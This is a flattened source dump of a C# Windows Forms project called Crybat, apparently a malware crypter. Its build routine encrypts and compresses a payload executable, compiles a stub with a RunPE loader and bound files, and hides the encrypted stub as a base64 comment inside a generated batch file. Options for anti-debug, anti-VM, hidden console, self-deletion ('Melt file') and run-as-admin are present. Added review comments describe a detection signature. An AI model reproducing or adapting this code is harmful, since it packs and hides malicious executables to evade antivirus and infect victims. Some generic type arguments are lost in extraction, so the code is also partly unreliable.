        // can embed it as a resource; the compiled stub goes to a temp file.
        listBox2.Items.Add("Building stub...");
        string tempfile = Path.GetTempFileName();
        File.WriteAllBytes("payload.exe", payload_enc);
        if (!isnetasm)
        {
            byte[] runpedll_enc = Encrypt(mode, Compress(GetEmbeddedResource("Crybat.Resources.runpe.dll")), _stubkey, _stubiv);
            File.WriteAllBytes("runpe.dll", runpedll_enc);
        }
        CSharpCodeProvider csc = new CSharpCodeProvider();
        CompilerParameters parameters = new CompilerParameters(new[] { "mscorlib.dll", "System.Core.dll", "System.dll", "System.Management.dll" }, tempfile)
        {
            GenerateExecutable = true,
            CompilerOptions = "-optimize",
            IncludeDebugInformation = false
        };
        parameters.EmbeddedResources.Add("payload.exe");
        if (!isnetasm) parameters.EmbeddedResources.Add("runpe.dll");
        // Files from the binder list are embedded unencrypted, by path.
        foreach (string item in listBox1.Items) parameters.EmbeddedResources.Add(item);
        CompilerResults results = csc.CompileAssemblyFromSource(parameters, stub);
        if (results.Errors.Count > 0)
        {
            // NOTE(review): this deletes "payload.txt", but the file written above is
            // "payload.exe"; on a failed build the encrypted payload stays on disk.
            File.Delete("payload.txt");
            if (!isnetasm) File.Delete("runpe.dll");
            File.Delete(tempfile);
            // NOTE(review): the generic type argument looks lost in extraction here
            // (likely List<string>); the line is reproduced as it appears on the page.
            List errors = new List();
            foreach (CompilerError error in results.Errors) errors.Add(error.ToString());
            MessageBox.Show($"Stub build errors:{Environment.NewLine}{string.Join(Environment.NewLine, errors)}", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
            buildButton.Enabled = true;
            return;
        }
        byte[] stubbytes = File.ReadAllBytes(tempfile);
        File.Delete("payload.exe");
        if (!isnetasm) File.Delete("runpe.dll");
        File.Delete(tempfile);

        listBox2.Items.Add("Encrypting stub...");
        byte[] stub_enc = Encrypt(mode, Compress(stubbytes), _key, _iv);

        // The compressed, encrypted stub travels inside the batch file as one line of
        // the form ":: <base64>", inserted at a random line index. The PowerShell stub
        // templates in this project read the batch file itself and take the first line
        // starting with ":: ". Detection: a .bat file containing a single very long
        // "::" comment line of base64 is the stable artifact of this output format.
        listBox2.Items.Add("Creating batch file...");
        string content = FileGen.CreateBat(_key, _iv, mode, hidden.Checked, selfDelete.Checked, runas.Checked, rng);
        List content_lines = new List(content.Split(new string[] { Environment.NewLine }, StringSplitOptions.None));
        content_lines.Insert(rng.Next(0, content_lines.Count), ":: " + Convert.ToBase64String(stub_enc));
        content = string.Join(Environment.NewLine, content_lines);

        SaveFileDialog sfd = new SaveFileDialog()
        {
            AddExtension = true,
            DefaultExt = "bat",
            Title = "Save File",
            Filter = "Batch files (*.bat)|*.bat",
            RestoreDirectory = true,
            FileName = Path.ChangeExtension(_input, "bat")
        };
        // The dialog result is not checked; the file name left in the dialog is used
        // whether or not the user confirmed.
        sfd.ShowDialog();

        listBox2.Items.Add("Writing output...");
        File.WriteAllText(sfd.FileName, content, Encoding.ASCII);

        MessageBox.Show("Done!", "Success", MessageBoxButtons.OK, MessageBoxIcon.Information);
        buildButton.Enabled = true;
    }

    // Fetches the latest version string over HTTPS and compares it with the value
    // cached in <base directory>\bin\latestversion. The downloaded string is remote,
    // unvalidated data: it is shown in the message box, appended to the release URL
    // handed to Process.Start, and written to the cache file. All exceptions are
    // swallowed by the empty catch.
    private void CheckVersion()
    {
        try
        {
            WebClient wc = new WebClient();
            string latestversion = wc.DownloadString("https://raw.githubusercontent.com/ch2sh/Crybat/main/version").Trim();
            wc.Dispose();
            if (File.Exists(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion"))
            {
                string currentversion = File.ReadAllText(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion").Trim();
                if (currentversion != latestversion)
                {
                    DialogResult result = MessageBox.Show($"Crybat {currentversion} is outdated. Download {latestversion}?", "Warning", MessageBoxButtons.YesNoCancel, MessageBoxIcon.Exclamation);
                    if (result == DialogResult.Yes)
                    {
                        Process.Start("https://github.com/ch2sh/Crybat/releases/tag/" + latestversion);
                    }
                }
            }
            File.WriteAllText(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion", latestversion);
        }
        catch { }
    }

    // Fills both key/IV text-box pairs with the values a freshly constructed
    // AesManaged instance generates for itself, base64-encoded.
    private void UpdateKeys(object sender, EventArgs e)
    {
        AesManaged aes = new AesManaged();
        key1.Text = Convert.ToBase64String(aes.Key);
        iv1.Text = Convert.ToBase64String(aes.IV);
        aes.Dispose();
        aes = new AesManaged();
        key2.Text = Convert.ToBase64String(aes.Key);
        iv6.Text = Convert.ToBase64String(aes.IV);
        aes.Dispose();
    }

    // Copies a loaded SettingsObject into the form controls.
    private void UnpackSettings(SettingsObject obj)
    {
        textBox1.Text = obj.inputFile;
        antiDebug.Checked = obj.antiDebug;
        antiVM.Checked = obj.antiVM;
        selfDelete.Checked = obj.selfDelete;
        hidden.Checked = obj.hidden;
        runas.Checked = obj.runas;
        aesEncryption.Checked = obj.aes;
        xorEncryption.Checked = obj.xor;
        listBox1.Items.AddRange(obj.bindedFiles);
    }

    // Captures the current control state as a SettingsObject. Key material from the
    // encryption tab is not part of the saved settings.
    private SettingsObject PackSettings()
    {
        SettingsObject obj = new SettingsObject()
        {
            inputFile = textBox1.Text,
            antiDebug = antiDebug.Checked,
            antiVM = antiVM.Checked,
            selfDelete = selfDelete.Checked,
            hidden = hidden.Checked,
            runas = runas.Checked,
            aes = aesEncryption.Checked,
            xor = xorEncryption.Checked
        };
        List paths = new List();
        foreach (string item in listBox1.Items) paths.Add(item);
        obj.bindedFiles = paths.ToArray();
        return obj;
    }
}
246 | }
247 |
--------------------------------------------------------------------------------
/Crybat/Crybat.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}
9 | WinExe
10 | Crybat
11 | Crybat
12 | v4.8
13 | 512
14 | true
15 | true
16 |
17 |
18 |
19 |
20 | AnyCPU
21 | true
22 | full
23 | false
24 | bin\Debug\
25 | DEBUG;TRACE
26 | prompt
27 | 4
28 |
29 |
30 | AnyCPU
31 | none
32 | true
33 | bin\Release\
34 | TRACE
35 | prompt
36 | 4
37 |
38 |
39 |
40 | ..\packages\Costura.Fody.5.7.0\lib\netstandard1.0\Costura.dll
41 |
42 |
43 | ..\packages\dnlib.3.5.0\lib\net45\dnlib.dll
44 |
45 |
46 | ..\packages\Microsoft.Win32.Primitives.4.3.0\lib\net46\Microsoft.Win32.Primitives.dll
47 | True
48 | True
49 |
50 |
51 | ..\packages\Newtonsoft.Json.13.0.1\lib\net45\Newtonsoft.Json.dll
52 |
53 |
54 |
55 | ..\packages\System.AppContext.4.3.0\lib\net463\System.AppContext.dll
56 | True
57 | True
58 |
59 |
60 |
61 | ..\packages\System.Console.4.3.0\lib\net46\System.Console.dll
62 | True
63 | True
64 |
65 |
66 |
67 | ..\packages\System.Diagnostics.DiagnosticSource.4.3.0\lib\net46\System.Diagnostics.DiagnosticSource.dll
68 |
69 |
70 | ..\packages\System.Diagnostics.Tracing.4.3.0\lib\net462\System.Diagnostics.Tracing.dll
71 | True
72 | True
73 |
74 |
75 | ..\packages\System.Globalization.Calendars.4.3.0\lib\net46\System.Globalization.Calendars.dll
76 | True
77 | True
78 |
79 |
80 | ..\packages\System.IO.4.3.0\lib\net462\System.IO.dll
81 | True
82 | True
83 |
84 |
85 | ..\packages\System.IO.Compression.4.3.0\lib\net46\System.IO.Compression.dll
86 | True
87 | True
88 |
89 |
90 |
91 | ..\packages\System.IO.Compression.ZipFile.4.3.0\lib\net46\System.IO.Compression.ZipFile.dll
92 | True
93 | True
94 |
95 |
96 | ..\packages\System.IO.FileSystem.4.3.0\lib\net46\System.IO.FileSystem.dll
97 | True
98 | True
99 |
100 |
101 | ..\packages\System.IO.FileSystem.Primitives.4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll
102 | True
103 | True
104 |
105 |
106 | ..\packages\System.Linq.4.3.0\lib\net463\System.Linq.dll
107 | True
108 | True
109 |
110 |
111 | ..\packages\System.Linq.Expressions.4.3.0\lib\net463\System.Linq.Expressions.dll
112 | True
113 | True
114 |
115 |
116 | ..\packages\System.Net.Http.4.3.0\lib\net46\System.Net.Http.dll
117 | True
118 | True
119 |
120 |
121 | ..\packages\System.Net.Sockets.4.3.0\lib\net46\System.Net.Sockets.dll
122 | True
123 | True
124 |
125 |
126 |
127 | ..\packages\System.Reflection.4.3.0\lib\net462\System.Reflection.dll
128 | True
129 | True
130 |
131 |
132 | ..\packages\System.Runtime.4.3.0\lib\net462\System.Runtime.dll
133 | True
134 | True
135 |
136 |
137 | ..\packages\System.Runtime.Extensions.4.3.0\lib\net462\System.Runtime.Extensions.dll
138 | True
139 | True
140 |
141 |
142 | ..\packages\System.Runtime.InteropServices.4.3.0\lib\net463\System.Runtime.InteropServices.dll
143 | True
144 | True
145 |
146 |
147 | ..\packages\System.Runtime.InteropServices.RuntimeInformation.4.3.0\lib\net45\System.Runtime.InteropServices.RuntimeInformation.dll
148 | True
149 | True
150 |
151 |
152 | ..\packages\System.Security.Cryptography.Algorithms.4.3.0\lib\net463\System.Security.Cryptography.Algorithms.dll
153 | True
154 | True
155 |
156 |
157 | ..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll
158 | True
159 | True
160 |
161 |
162 | ..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll
163 | True
164 | True
165 |
166 |
167 | ..\packages\System.Security.Cryptography.X509Certificates.4.3.0\lib\net461\System.Security.Cryptography.X509Certificates.dll
168 | True
169 | True
170 |
171 |
172 | ..\packages\System.Text.RegularExpressions.4.3.0\lib\net463\System.Text.RegularExpressions.dll
173 | True
174 | True
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 | ..\packages\System.Xml.ReaderWriter.4.3.0\lib\net46\System.Xml.ReaderWriter.dll
186 | True
187 | True
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 | Form
197 |
198 |
199 | Form1.cs
200 |
201 |
202 |
203 |
204 |
205 |
206 | Form1.cs
207 |
208 |
209 |
210 | ResXFileCodeGenerator
211 | Resources.Designer.cs
212 | Designer
213 |
214 |
215 | True
216 | Resources.resx
217 | True
218 |
219 |
220 |
221 | SettingsSingleFileGenerator
222 | Settings.Designer.cs
223 |
224 |
225 | True
226 | Settings.settings
227 | True
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
243 |
244 |
245 |
246 |
247 |
248 |
249 |
--------------------------------------------------------------------------------
/Crybat/Form1.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace Crybat
2 | {
3 | partial class Form1
4 | {
5 | /// <summary>
6 | /// Required designer variable.
7 | /// </summary>
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | /// <summary>
11 | /// Clean up any resources being used.
12 | /// </summary>
13 | /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
    // The designer's component container is released only on an explicit
    // Dispose call, and only if it was ever created.
    if (disposing)
    {
        components?.Dispose();
    }

    base.Dispose(disposing);
}
22 |
23 | #region Windows Form Designer generated code
24 |
25 | /// <summary>
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | /// </summary>
29 | private void InitializeComponent()
30 | {
31 | this.label1 = new System.Windows.Forms.Label();
32 | this.textBox1 = new System.Windows.Forms.TextBox();
33 | this.openButton = new System.Windows.Forms.Button();
34 | this.antiDebug = new System.Windows.Forms.CheckBox();
35 | this.buildButton = new System.Windows.Forms.Button();
36 | this.selfDelete = new System.Windows.Forms.CheckBox();
37 | this.hidden = new System.Windows.Forms.CheckBox();
38 | this.antiVM = new System.Windows.Forms.CheckBox();
39 | this.tabControl1 = new System.Windows.Forms.TabControl();
40 | this.optionsPage = new System.Windows.Forms.TabPage();
41 | this.encryptionPage = new System.Windows.Forms.TabPage();
42 | this.refreshKeys = new System.Windows.Forms.Button();
43 | this.iv6 = new System.Windows.Forms.TextBox();
44 | this.iv1 = new System.Windows.Forms.TextBox();
45 | this.key2 = new System.Windows.Forms.TextBox();
46 | this.label3 = new System.Windows.Forms.Label();
47 | this.key1 = new System.Windows.Forms.TextBox();
48 | this.label2 = new System.Windows.Forms.Label();
49 | this.xorEncryption = new System.Windows.Forms.CheckBox();
50 | this.aesEncryption = new System.Windows.Forms.CheckBox();
51 | this.binderPage = new System.Windows.Forms.TabPage();
52 | this.removeFile = new System.Windows.Forms.Button();
53 | this.addFile = new System.Windows.Forms.Button();
54 | this.listBox1 = new System.Windows.Forms.ListBox();
55 | this.outputPage = new System.Windows.Forms.TabPage();
56 | this.listBox2 = new System.Windows.Forms.ListBox();
57 | this.runas = new System.Windows.Forms.CheckBox();
58 | this.tabControl1.SuspendLayout();
59 | this.optionsPage.SuspendLayout();
60 | this.encryptionPage.SuspendLayout();
61 | this.binderPage.SuspendLayout();
62 | this.outputPage.SuspendLayout();
63 | this.SuspendLayout();
64 | //
65 | // label1
66 | //
67 | this.label1.AutoSize = true;
68 | this.label1.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
69 | this.label1.Location = new System.Drawing.Point(9, 14);
70 | this.label1.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0);
71 | this.label1.Name = "label1";
72 | this.label1.Size = new System.Drawing.Size(67, 18);
73 | this.label1.TabIndex = 0;
74 | this.label1.Text = "File path:";
75 | //
76 | // textBox1
77 | //
78 | this.textBox1.Location = new System.Drawing.Point(12, 35);
79 | this.textBox1.Margin = new System.Windows.Forms.Padding(2);
80 | this.textBox1.Name = "textBox1";
81 | this.textBox1.Size = new System.Drawing.Size(469, 22);
82 | this.textBox1.TabIndex = 1;
83 | //
84 | // openButton
85 | //
86 | this.openButton.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Right)));
87 | this.openButton.Location = new System.Drawing.Point(485, 34);
88 | this.openButton.Margin = new System.Windows.Forms.Padding(2);
89 | this.openButton.Name = "openButton";
90 | this.openButton.Size = new System.Drawing.Size(75, 25);
91 | this.openButton.TabIndex = 2;
92 | this.openButton.Text = "...";
93 | this.openButton.UseVisualStyleBackColor = true;
94 | this.openButton.Click += new System.EventHandler(this.openButton_Click);
95 | //
96 | // antiDebug
97 | //
98 | this.antiDebug.AutoSize = true;
99 | this.antiDebug.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
100 | this.antiDebug.Location = new System.Drawing.Point(4, 4);
101 | this.antiDebug.Margin = new System.Windows.Forms.Padding(2);
102 | this.antiDebug.Name = "antiDebug";
103 | this.antiDebug.Size = new System.Drawing.Size(101, 22);
104 | this.antiDebug.TabIndex = 6;
105 | this.antiDebug.Text = "Anti Debug";
106 | this.antiDebug.UseVisualStyleBackColor = true;
107 | //
108 | // buildButton
109 | //
110 | this.buildButton.Location = new System.Drawing.Point(11, 359);
111 | this.buildButton.Margin = new System.Windows.Forms.Padding(2);
112 | this.buildButton.Name = "buildButton";
113 | this.buildButton.Size = new System.Drawing.Size(550, 48);
114 | this.buildButton.TabIndex = 7;
115 | this.buildButton.Text = "Build";
116 | this.buildButton.UseVisualStyleBackColor = true;
117 | this.buildButton.Click += new System.EventHandler(this.buildButton_Click);
118 | //
119 | // selfDelete
120 | //
121 | this.selfDelete.AutoSize = true;
122 | this.selfDelete.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
123 | this.selfDelete.Location = new System.Drawing.Point(4, 56);
124 | this.selfDelete.Margin = new System.Windows.Forms.Padding(2);
125 | this.selfDelete.Name = "selfDelete";
126 | this.selfDelete.Size = new System.Drawing.Size(80, 22);
127 | this.selfDelete.TabIndex = 8;
128 | this.selfDelete.Text = "Melt file";
129 | this.selfDelete.UseVisualStyleBackColor = true;
130 | //
131 | // hidden
132 | //
133 | this.hidden.AutoSize = true;
134 | this.hidden.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
135 | this.hidden.Location = new System.Drawing.Point(4, 82);
136 | this.hidden.Margin = new System.Windows.Forms.Padding(2);
137 | this.hidden.Name = "hidden";
138 | this.hidden.Size = new System.Drawing.Size(117, 22);
139 | this.hidden.TabIndex = 9;
140 | this.hidden.Text = "Hide console";
141 | this.hidden.UseVisualStyleBackColor = true;
142 | //
143 | // antiVM
144 | //
145 | this.antiVM.AutoSize = true;
146 | this.antiVM.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
147 | this.antiVM.Location = new System.Drawing.Point(4, 30);
148 | this.antiVM.Margin = new System.Windows.Forms.Padding(2);
149 | this.antiVM.Name = "antiVM";
150 | this.antiVM.Size = new System.Drawing.Size(80, 22);
151 | this.antiVM.TabIndex = 10;
152 | this.antiVM.Text = "Anti VM";
153 | this.antiVM.UseVisualStyleBackColor = true;
154 | //
155 | // tabControl1
156 | //
157 | this.tabControl1.Controls.Add(this.optionsPage);
158 | this.tabControl1.Controls.Add(this.encryptionPage);
159 | this.tabControl1.Controls.Add(this.binderPage);
160 | this.tabControl1.Controls.Add(this.outputPage);
161 | this.tabControl1.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
162 | this.tabControl1.Location = new System.Drawing.Point(12, 65);
163 | this.tabControl1.Margin = new System.Windows.Forms.Padding(2);
164 | this.tabControl1.Name = "tabControl1";
165 | this.tabControl1.SelectedIndex = 0;
166 | this.tabControl1.Size = new System.Drawing.Size(548, 290);
167 | this.tabControl1.TabIndex = 11;
168 | //
169 | // optionsPage
170 | //
171 | this.optionsPage.Controls.Add(this.runas);
172 | this.optionsPage.Controls.Add(this.hidden);
173 | this.optionsPage.Controls.Add(this.selfDelete);
174 | this.optionsPage.Controls.Add(this.antiDebug);
175 | this.optionsPage.Controls.Add(this.antiVM);
176 | this.optionsPage.Location = new System.Drawing.Point(4, 26);
177 | this.optionsPage.Margin = new System.Windows.Forms.Padding(2);
178 | this.optionsPage.Name = "optionsPage";
179 | this.optionsPage.Padding = new System.Windows.Forms.Padding(2);
180 | this.optionsPage.Size = new System.Drawing.Size(540, 260);
181 | this.optionsPage.TabIndex = 0;
182 | this.optionsPage.Text = "Options";
183 | this.optionsPage.UseVisualStyleBackColor = true;
184 | //
185 | // encryptionPage
186 | //
187 | this.encryptionPage.Controls.Add(this.refreshKeys);
188 | this.encryptionPage.Controls.Add(this.iv6);
189 | this.encryptionPage.Controls.Add(this.iv1);
190 | this.encryptionPage.Controls.Add(this.key2);
191 | this.encryptionPage.Controls.Add(this.label3);
192 | this.encryptionPage.Controls.Add(this.key1);
193 | this.encryptionPage.Controls.Add(this.label2);
194 | this.encryptionPage.Controls.Add(this.xorEncryption);
195 | this.encryptionPage.Controls.Add(this.aesEncryption);
196 | this.encryptionPage.Location = new System.Drawing.Point(4, 26);
197 | this.encryptionPage.Margin = new System.Windows.Forms.Padding(2);
198 | this.encryptionPage.Name = "encryptionPage";
199 | this.encryptionPage.Padding = new System.Windows.Forms.Padding(2);
200 | this.encryptionPage.Size = new System.Drawing.Size(540, 260);
201 | this.encryptionPage.TabIndex = 1;
202 | this.encryptionPage.Text = "Encryption";
203 | this.encryptionPage.UseVisualStyleBackColor = true;
204 | //
205 | // refreshKeys
206 | //
207 | this.refreshKeys.Location = new System.Drawing.Point(164, 194);
208 | this.refreshKeys.Margin = new System.Windows.Forms.Padding(2);
209 | this.refreshKeys.Name = "refreshKeys";
210 | this.refreshKeys.Size = new System.Drawing.Size(114, 25);
211 | this.refreshKeys.TabIndex = 9;
212 | this.refreshKeys.Text = "Refresh keys";
213 | this.refreshKeys.UseVisualStyleBackColor = true;
214 | this.refreshKeys.Click += new System.EventHandler(this.UpdateKeys);
215 | //
216 | // iv6
217 | //
218 | this.iv6.Location = new System.Drawing.Point(52, 156);
219 | this.iv6.Margin = new System.Windows.Forms.Padding(2);
220 | this.iv6.Name = "iv6";
221 | this.iv6.ReadOnly = true;
222 | this.iv6.Size = new System.Drawing.Size(226, 23);
223 | this.iv6.TabIndex = 8;
224 | //
225 | // iv1
226 | //
227 | this.iv1.Location = new System.Drawing.Point(52, 128);
228 | this.iv1.Margin = new System.Windows.Forms.Padding(2);
229 | this.iv1.Name = "iv1";
230 | this.iv1.ReadOnly = true;
231 | this.iv1.Size = new System.Drawing.Size(226, 23);
232 | this.iv1.TabIndex = 7;
233 | //
234 | // key2
235 | //
236 | this.key2.Location = new System.Drawing.Point(52, 96);
237 | this.key2.Margin = new System.Windows.Forms.Padding(2);
238 | this.key2.Name = "key2";
239 | this.key2.ReadOnly = true;
240 | this.key2.Size = new System.Drawing.Size(226, 23);
241 | this.key2.TabIndex = 6;
242 | //
243 | // label3
244 | //
245 | this.label3.AutoSize = true;
246 | this.label3.Location = new System.Drawing.Point(18, 131);
247 | this.label3.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0);
248 | this.label3.Name = "label3";
249 | this.label3.Size = new System.Drawing.Size(31, 17);
250 | this.label3.TabIndex = 5;
251 | this.label3.Text = "IVs:";
252 | //
253 | // key1
254 | //
255 | this.key1.Location = new System.Drawing.Point(52, 71);
256 | this.key1.Margin = new System.Windows.Forms.Padding(2);
257 | this.key1.Name = "key1";
258 | this.key1.ReadOnly = true;
259 | this.key1.Size = new System.Drawing.Size(226, 23);
260 | this.key1.TabIndex = 3;
261 | //
262 | // label2
263 | //
264 | this.label2.AutoSize = true;
265 | this.label2.Location = new System.Drawing.Point(6, 71);
266 | this.label2.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0);
267 | this.label2.Name = "label2";
268 | this.label2.Size = new System.Drawing.Size(43, 17);
269 | this.label2.TabIndex = 2;
270 | this.label2.Text = "Keys:";
271 | //
272 | // xorEncryption
273 | //
274 | this.xorEncryption.AutoSize = true;
275 | this.xorEncryption.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
276 | this.xorEncryption.Location = new System.Drawing.Point(4, 30);
277 | this.xorEncryption.Margin = new System.Windows.Forms.Padding(2);
278 | this.xorEncryption.Name = "xorEncryption";
279 | this.xorEncryption.Size = new System.Drawing.Size(63, 22);
280 | this.xorEncryption.TabIndex = 1;
281 | this.xorEncryption.Text = "XOR";
282 | this.xorEncryption.UseVisualStyleBackColor = true;
283 | this.xorEncryption.CheckedChanged += new System.EventHandler(this.xorEncryption_CheckedChanged);
284 | //
285 | // aesEncryption
286 | //
287 | this.aesEncryption.AutoSize = true;
288 | this.aesEncryption.Checked = true;
289 | this.aesEncryption.CheckState = System.Windows.Forms.CheckState.Checked;
290 | this.aesEncryption.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
291 | this.aesEncryption.Location = new System.Drawing.Point(4, 4);
292 | this.aesEncryption.Margin = new System.Windows.Forms.Padding(2);
293 | this.aesEncryption.Name = "aesEncryption";
294 | this.aesEncryption.Size = new System.Drawing.Size(59, 22);
295 | this.aesEncryption.TabIndex = 0;
296 | this.aesEncryption.Text = "AES";
297 | this.aesEncryption.UseVisualStyleBackColor = true;
298 | this.aesEncryption.CheckedChanged += new System.EventHandler(this.aesEncryption_CheckedChanged);
299 | //
300 | // binderPage
301 | //
302 | this.binderPage.Controls.Add(this.removeFile);
303 | this.binderPage.Controls.Add(this.addFile);
304 | this.binderPage.Controls.Add(this.listBox1);
305 | this.binderPage.Location = new System.Drawing.Point(4, 26);
306 | this.binderPage.Margin = new System.Windows.Forms.Padding(2);
307 | this.binderPage.Name = "binderPage";
308 | this.binderPage.Padding = new System.Windows.Forms.Padding(2);
309 | this.binderPage.Size = new System.Drawing.Size(540, 260);
310 | this.binderPage.TabIndex = 2;
311 | this.binderPage.Text = "Binder";
312 | this.binderPage.UseVisualStyleBackColor = true;
313 | //
314 | // removeFile
315 | //
316 | this.removeFile.Location = new System.Drawing.Point(122, 221);
317 | this.removeFile.Margin = new System.Windows.Forms.Padding(2);
318 | this.removeFile.Name = "removeFile";
319 | this.removeFile.Size = new System.Drawing.Size(116, 34);
320 | this.removeFile.TabIndex = 2;
321 | this.removeFile.Text = "Remove file";
322 | this.removeFile.UseVisualStyleBackColor = true;
323 | this.removeFile.Click += new System.EventHandler(this.removeFile_Click);
324 | //
325 | // addFile
326 | //
327 | this.addFile.Location = new System.Drawing.Point(2, 221);
328 | this.addFile.Margin = new System.Windows.Forms.Padding(2);
329 | this.addFile.Name = "addFile";
330 | this.addFile.Size = new System.Drawing.Size(116, 34);
331 | this.addFile.TabIndex = 1;
332 | this.addFile.Text = "Add file";
333 | this.addFile.UseVisualStyleBackColor = true;
334 | this.addFile.Click += new System.EventHandler(this.addFile_Click);
335 | //
336 | // listBox1
337 | //
338 | this.listBox1.FormattingEnabled = true;
339 | this.listBox1.ItemHeight = 17;
340 | this.listBox1.Location = new System.Drawing.Point(2, 5);
341 | this.listBox1.Margin = new System.Windows.Forms.Padding(2);
342 | this.listBox1.Name = "listBox1";
343 | this.listBox1.Size = new System.Drawing.Size(532, 208);
344 | this.listBox1.TabIndex = 0;
345 | //
346 | // outputPage
347 | //
348 | this.outputPage.Controls.Add(this.listBox2);
349 | this.outputPage.Location = new System.Drawing.Point(4, 26);
350 | this.outputPage.Margin = new System.Windows.Forms.Padding(2);
351 | this.outputPage.Name = "outputPage";
352 | this.outputPage.Padding = new System.Windows.Forms.Padding(2);
353 | this.outputPage.Size = new System.Drawing.Size(540, 260);
354 | this.outputPage.TabIndex = 3;
355 | this.outputPage.Text = "Output";
356 | this.outputPage.UseVisualStyleBackColor = true;
357 | //
358 | // listBox2
359 | //
360 | this.listBox2.FormattingEnabled = true;
361 | this.listBox2.ItemHeight = 17;
362 | this.listBox2.Location = new System.Drawing.Point(4, 4);
363 | this.listBox2.Margin = new System.Windows.Forms.Padding(2);
364 | this.listBox2.Name = "listBox2";
365 | this.listBox2.Size = new System.Drawing.Size(532, 242);
366 | this.listBox2.TabIndex = 4;
367 | //
368 | // runas
369 | //
370 | this.runas.AutoSize = true;
371 | this.runas.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
372 | this.runas.Location = new System.Drawing.Point(4, 108);
373 | this.runas.Margin = new System.Windows.Forms.Padding(2);
374 | this.runas.Name = "runas";
375 | this.runas.Size = new System.Drawing.Size(121, 22);
376 | this.runas.TabIndex = 11;
377 | this.runas.Text = "Run as admin";
378 | this.runas.UseVisualStyleBackColor = true;
379 | //
380 | // Form1
381 | //
382 | this.AutoScaleDimensions = new System.Drawing.SizeF(120F, 120F);
383 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Dpi;
384 | this.ClientSize = new System.Drawing.Size(571, 418);
385 | this.Controls.Add(this.tabControl1);
386 | this.Controls.Add(this.buildButton);
387 | this.Controls.Add(this.openButton);
388 | this.Controls.Add(this.textBox1);
389 | this.Controls.Add(this.label1);
390 | this.DoubleBuffered = true;
391 | this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle;
392 | this.Margin = new System.Windows.Forms.Padding(2);
393 | this.MaximizeBox = false;
394 | this.Name = "Form1";
395 | this.ShowIcon = false;
396 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
397 | this.Text = "Crybat";
398 | this.FormClosing += new System.Windows.Forms.FormClosingEventHandler(this.Form1_FormClosing);
399 | this.Load += new System.EventHandler(this.Form1_Load);
400 | this.tabControl1.ResumeLayout(false);
401 | this.optionsPage.ResumeLayout(false);
402 | this.optionsPage.PerformLayout();
403 | this.encryptionPage.ResumeLayout(false);
404 | this.encryptionPage.PerformLayout();
405 | this.binderPage.ResumeLayout(false);
406 | this.outputPage.ResumeLayout(false);
407 | this.ResumeLayout(false);
408 | this.PerformLayout();
409 |
410 | }
411 |
412 | #endregion
413 |
414 | private System.Windows.Forms.Label label1; // Designer-generated control fields of Form1 start here. label1: caption "File path:".
415 | private System.Windows.Forms.TextBox textBox1; // Text box placed under the "File path:" caption; presumably holds the input file path (confirm in Form1.cs).
416 | private System.Windows.Forms.Button openButton; // "..." button; Click is wired to openButton_Click.
417 | private System.Windows.Forms.CheckBox antiDebug; // "Anti Debug" check box on optionsPage. NOTE(review): the designer code only creates and labels the option boxes; how their state is consumed is not visible here.
418 | private System.Windows.Forms.Button buildButton; // "Build" button; Click is wired to buildButton_Click.
419 | private System.Windows.Forms.CheckBox selfDelete; // Check box labelled "Melt file" on optionsPage.
420 | private System.Windows.Forms.CheckBox hidden; // Check box labelled "Hide console" on optionsPage.
421 | private System.Windows.Forms.CheckBox antiVM; // "Anti VM" check box on optionsPage.
422 | private System.Windows.Forms.TabControl tabControl1; // Hosts optionsPage, encryptionPage, binderPage and outputPage.
423 | private System.Windows.Forms.TabPage optionsPage; // "Options" tab.
